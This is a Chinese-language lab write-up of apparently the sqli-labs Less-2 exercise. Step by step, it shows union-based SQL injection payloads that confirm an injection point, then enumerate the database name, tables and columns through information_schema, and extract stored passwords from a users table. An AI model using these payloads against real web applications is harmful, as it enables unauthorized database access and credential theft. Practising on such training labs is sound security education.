这个题目,打开网页显示输入一个整数id作为参数,输入id=1打开页面查看,显示出了一个名字和密码,在1后面加单引号测试一下看会不会出错。
可以看到报了一个语法错误。接下来再尝试在后面跟 and 1=1#和and 1=2# 测试一下。
/sql/Less-2/?id=1 and 1=1#
结果如下图,与id=1结果没有不同,下面尝试 and 1=2;
/sql/Less-2/?id=1 and 1=2#
当注入 and 1=2;时 返回结果与上面不同,可以确定这是一个注入点。
接下来尝试使用
sql/Less-2/?id=1 union select 1,2,3#
来查看回显位置在哪里。
考虑可能是由于显示位置只有两个,当我们设置一个数据库中没有的id值时,就可以回显union查询的内容。
/sql/Less-2/?id=-1 union select 1,2,3#
我们看到回显2和3的位置。
我们可以使用user()与database()两个函数查看使用数据库的用户和数据库名字。
/sql/Less-2/?id=-1 union select 1,user(),database()#
我们可以看到数据库用户是root,数据库的名称是security。
接下来就可以爆数据库中的表名称。
/sql/Less-2/?id=-1 union select 1,(select table_name from information_schema.tables where table_schema='security' limit 0,1),3#
我们看到有一个emails表,修改limit的参数值可以查看数据库中的其他表名称。
/sql/Less-2/?id=-1 union select 1,(select table_name from information_schema.tables where table_schema='security' limit 3,1),3#
接下来爆users表的字段名称。
/sql/Less-2/?id=-1 union select 1,(select column_name from information_schema.columns where table_name='users' limit 0,1),3#
同样的修改limit的参数值可以获取其他字段名称。
/sql/Less-2/?id=-1 union select 1,(select column_name from information_schema.columns where table_name='users' limit 1,1),3#
接下来就可以查询密码一列的内容。
/sql/Less-2/?id=-1 union select 1,(select password from security.users limit 6,1),3#
搞定